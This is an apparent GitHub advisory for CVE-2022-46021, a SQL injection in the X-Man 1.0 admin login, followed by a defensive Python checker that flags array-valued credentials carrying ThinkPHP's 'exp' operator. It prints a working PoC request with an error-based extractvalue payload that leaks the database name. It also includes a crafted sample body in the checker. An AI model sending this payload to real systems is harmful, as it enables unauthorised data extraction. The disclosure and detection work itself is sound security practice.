CVE-2022-46021: GitHub - Howard512966/x-man-injection: x-man injection
X-Man 1.0 has a SQL injection vulnerability, which can cause data leakage.
README.md (last commit "Update README.md", January 6, 2023 03:06)
X-Man is an admin back-end system built on the ThinkPHP framework. Because it does not follow the ThinkPHP framework's development standard, a SQL injection vulnerability is introduced in the login handler.
Poc: http://ip/admin/login/check
POST: para=username[0]%3Dexp%26username[1]%3D=11 and(select extractvalue(1,concat(0x7e,(select database()))))%26password%3D213%26token%3D
Analysis: https://github.com/imxiny/x-man/blob/master/Application/Admin/Controller/LoginController.class.php
The parameter at line 60 is not filtered, so a SQL injection PoC can be constructed using the ThinkPHP framework's query syntax.
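The root cause described above is that a request parameter is handed to the ThinkPHP query builder without being checked. In ThinkPHP 3.x, `where()` treats an array-valued field as `[operator, value]`, and the `exp` operator inserts the value into the SQL as a raw expression; the PoC exploits this by sending `username` as an array inside the nested `para` query string. The following is an added defender-side example, written in Python and not part of the X-Man project or the advisory: it decodes a login request body the way PHP's `parse_str()` would, then rejects any request whose credential fields are not plain strings or carry the `exp` operator. The field names `username`, `password` and `token` are taken from the PoC; the sample request bodies are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Matches PHP-style array keys such as "username[0]" or "username[x]".
ARRAY_KEY = re.compile(r'^([A-Za-z_]\w*)\[([^\]]*)\]$')

# Constructed sample bodies (not captured traffic). The second one mirrors the
# shape of the PoC: the 'para' value is itself a query string in which
# 'username' is sent as an array whose first element is the 'exp' operator.
BENIGN_BODY = "para=username%3Dalice%26password%3Ds3cret%26token%3Dabc"
CRAFTED_BODY = "para=username[0]%3Dexp%26username[1]%3D%3D1%26password%3Dx%26token%3D"


def decode_login_params(body: str) -> dict:
    """Decode the outer POST body, then the nested 'para' query string.

    Returns a mapping of field name -> str for scalar fields, or
    field name -> {index: value} when the client sent a PHP-style array.
    """
    outer = parse_qs(body, keep_blank_values=True)
    para = outer.get("para", [""])[0]          # already percent-decoded once
    fields: dict = {}
    for key, values in parse_qs(para, keep_blank_values=True).items():
        m = ARRAY_KEY.match(key)
        if m:
            base, idx = m.groups()
            fields.setdefault(base, {})
            if isinstance(fields[base], dict):  # ignore scalar/array key clashes
                fields[base][idx] = values[0]
        else:
            fields[key] = values[0]
    return fields


def find_violations(fields: dict, expected=("username", "password", "token")) -> list:
    """Return the reasons a login request must be rejected before any query runs.

    A credential field must be a plain string. An array value would be read by
    ThinkPHP's where() as [operator, value]; 'exp' makes the value raw SQL.
    """
    reasons = []
    for name in expected:
        val = fields.get(name)
        if isinstance(val, dict):
            reasons.append(f"{name}: array value, expected scalar string")
            if any(str(v).lower() == "exp" for v in val.values()):
                reasons.append(f"{name}: ThinkPHP 'exp' raw-expression operator present")
    return reasons


def is_safe_login_request(body: str) -> bool:
    """True only when every credential field is a scalar string."""
    return not find_violations(decode_login_params(body))


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("crafted", CRAFTED_BODY)):
        print(label, "->", find_violations(decode_login_params(body)) or "ok")
```

The equivalent server-side fix is to coerce each credential to a string (or reject the request) before it reaches `where()`, so that the array/operator form can never be built from user input; the check above can also be run over web-server logs that record POST bodies to find attempts against `/admin/login/check`.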